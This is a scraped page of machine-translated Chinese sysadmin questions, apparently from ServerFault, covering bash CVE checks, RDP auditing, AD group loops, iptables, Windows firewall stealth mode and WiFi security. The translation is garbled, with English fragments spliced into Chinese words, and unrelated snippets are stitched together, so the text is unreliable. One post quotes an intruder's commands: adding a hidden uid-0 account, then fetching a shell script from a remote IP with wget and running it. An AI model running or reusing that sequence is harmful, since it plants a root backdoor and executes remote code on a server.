我有两个CentOS 5.10 boxen,我把bash升级到了最新版本。 但是,在其中一个框中, bash仍然容易受到CVE-2014-7169 (我正在使用此ServerFault答案中的testing)。 任何想法,为什么一台机器是好的,另一个不是? 我可以检查什么? 我已经检查过了: 1-确保两台机器运行相同的操作系统(两者的输出相同): # cat /etc/redhat-release CentOS release 5.10 (Final) 2-确保我有相同版本的bash (两个输出相同): # rpm -qi bash Name : bash Relocations: (not relocatable) Version : 3.2 Vendor: CentOS Release : 33.el5_10.4 Build Date: Thu 25 Sep 2014 08:58:19 PM UTC Install Date: Sat 27 Sep 2014 02:07:07 PM UTC […]
是否有使用远程桌面的历史logging。 我想查看和审核IP地址。 我正在运行由networking托pipe公司托pipe的专用服务器。 最近有一些问题,并试图validation除我以外的任何人实际login(即如果用户/通行证是妥协)。 谢谢, 尼尔·沃尔特斯
一个团体是否可以直接或间接包括自己? 换句话说,是否可以创build以下结构: Group-A └─ Group-B └─ Group-C └─ Group-A (recursion循环) AD检测并防止这种情况,还是允许它们处理recursion循环。 如果我有一个AD森林的pipe理访问权限,而且我并不害怕破坏现实的结构,那么我会自己testing一下。 Google,不幸的是 – 在回答这个问题方面没有什么帮助,虽然我可能不会在searchinput框中做出正确的咒语。
我可能刚刚检测到,我的服务器上的用户已经扎根我的服务器,但这不是我问的。 有没有人见过像这样的命令: echo _EoT_0.249348813417008_; id; echo _EoT_0.12781402577841_; echo $PATH && a=`env |grep PATH | awk -F '=' '{print $2":/usr/sbin"}'` && export PATH=$a && echo $PATH; echo _EoT_0.247556708344121_; whereis useradd; echo _EoT_0.905792585668774_; useradd -p saZlzoRm9L4Og -o -g 0 -u 0 aspnet; echo _EoT_0.369123892063307_; wget http://178.xxx.xxx.181/suhosin14.sh; echo _EoT_0.845361576801043_; chmod +x suhosin14.sh && ./suhosin14.sh && sleep 5 && […]
你在设置iptables时做了什么:改变默认策略(例如iptables -P INPUT DROP ),或者在规则集( iptables -A INPUT DROP )的最后添加一个catch-all规则? 如果你特别喜欢一个,你的偏好背后的理由是什么? 对于这个论坛来说,这个问题可能太主观了,但也许有一些很好的理由要select一个我不知道的问题。 与我的政策方式不同,由于过于乐观的iptables -F ,locking服务器可能更容易。 对于我来说,删除全面的规则可能会更容易,而不会意识到这一点,从而有效地将服务器全部打开(过去我曾经遇到过这种情况)。 确实,你不应该依靠防火墙作为你唯一的防止互联网的保护(大多数情况下,你可以使内部networking服务只绑定到本地主机或内部networking,例如),但是有时候,公共服务到特定的源networking等 就我个人而言,如果从头开始编写一个规则集,我倾向于第一个,但如果更新现有规则集,则坚持已有的规则集。
我有启用terminal服务的SBS 2003服务器。 目前,我可以通过访问www.mydomain.com将RDP发送到我的服务器。 我想限制RDP访问我的networking只能通过VPN。 但是,我担心我会不小心禁用RDP到我的服务器完全。 如何将远程访问configuration为仅在连接到VPN时可用?
在阅读本文和这篇文章之后 ,我决定在大多数情况下将所有的防火墙更改为拒绝,而不是阻止数据包。 我的经validation实了这些文章的论点。 不幸的是,Windows 2008 R2在默认情况下使用了所谓的“隐形模式”,我发现没有明显的方法来正确禁用它。 在Technet文章下方的注释中,有一个指向下面的msdn文章的链接,该文章显示了某种可能会禁用它的键或结构。 但是我无法在registry中find任何“隐形”的密钥。 无论如何,第二个评论表明这可能无法正常工作: 即使在防火墙被禁用的情况下,过滤平台的某些元素也始终处于活动状态,包括“隐形模式”,但不支持禁用隐形模式。 那么“隐身模式”还能做什么,而不是拒绝数据包? 有谁知道如何禁用隐形模式?
我想写一个服务,特别是从安全日志中提取事件查看器logging。 我特别感兴趣的是事件ID 4625(审计失败)消息。 理想情况下,我想存储导致审计失败的客户端的IP,超过n次,持续一段时间。 听起来很容易,所以我很快掀起了一个.NET服务来做到这一点。 但是,当我拉这些审计失败时,“源networking地址”值始终等于“ – ”。 我想知道Windows如何通过login,最终以失败告终,而不知道对方的IP地址。 另外值得注意的是IP地址确实被logging了几次,日志条目实际上包含许多其他有用的信息(如生成它的过程,失败原因,传输的服务等)。 有人可以告诉我为什么安全日志不知道尝试login和失败的人的IP地址?
在DDOS攻击期间,如果我们发现要阻塞的IP,我们会看到使用空路由而不是iptables的更好的性能? 空路由我们会做这样的事情: ip route add blackhole <ip or range> 在iptables中: /sbin/iptables -A INPUT -s <ip or range> -j DR 有没有区别? 我会怀疑route会更好,但我不确定。
我在工作中正在实施一个新的WiFinetworking,而我正在设法考虑networking的安全性devise。 用例1:客人。 我们将有一个强制性的门户设置,客人将接受一个可接受的使用政策,并将被限制在只有互联网,无法访问局域网。 简单的说,我们会让防火墙阻止危险的端口,不用担心,因为它们不能接触我们的主要networking。 使用案例2:使用BYOD的公司员工和公司拥有的笔记本电脑,可能需要几个月的时间才能被带到办公室。 Windows和OSX的混合。 他们将使用WPA2-Enterprise对我们的AD / RADIUS进行身份validation。 有没有一种好方法可以让这些人安全地访问内部服务器的局域网? 我的想法是,让这些人不受限制地访问局域网是有问题的。 如果他们是join域的,他们最终将从WSUS接收安全更新,但不一定在连接之前。 反病毒也不能保证。 我们现在已经有了有线networking,但这个数量还是很小的,但是我可以看到BYOD的增长,增加了一个无线networking,特别是对于我们大量的夏季实习生。 我已经研究了Microsoftnetworking访问保护来强制执行安全设置并隔离不符合规范的设备,但是我不确定它将如何与OS X(我能find的唯一代理,UNET之一,网站上有一些中断的链接定价不清楚)。 这似乎也相当复杂。 这是过度杀伤力? 在现实世界中,其他人如何处理这种情况呢? 有一个更简单的networking访问控制解决scheme的人?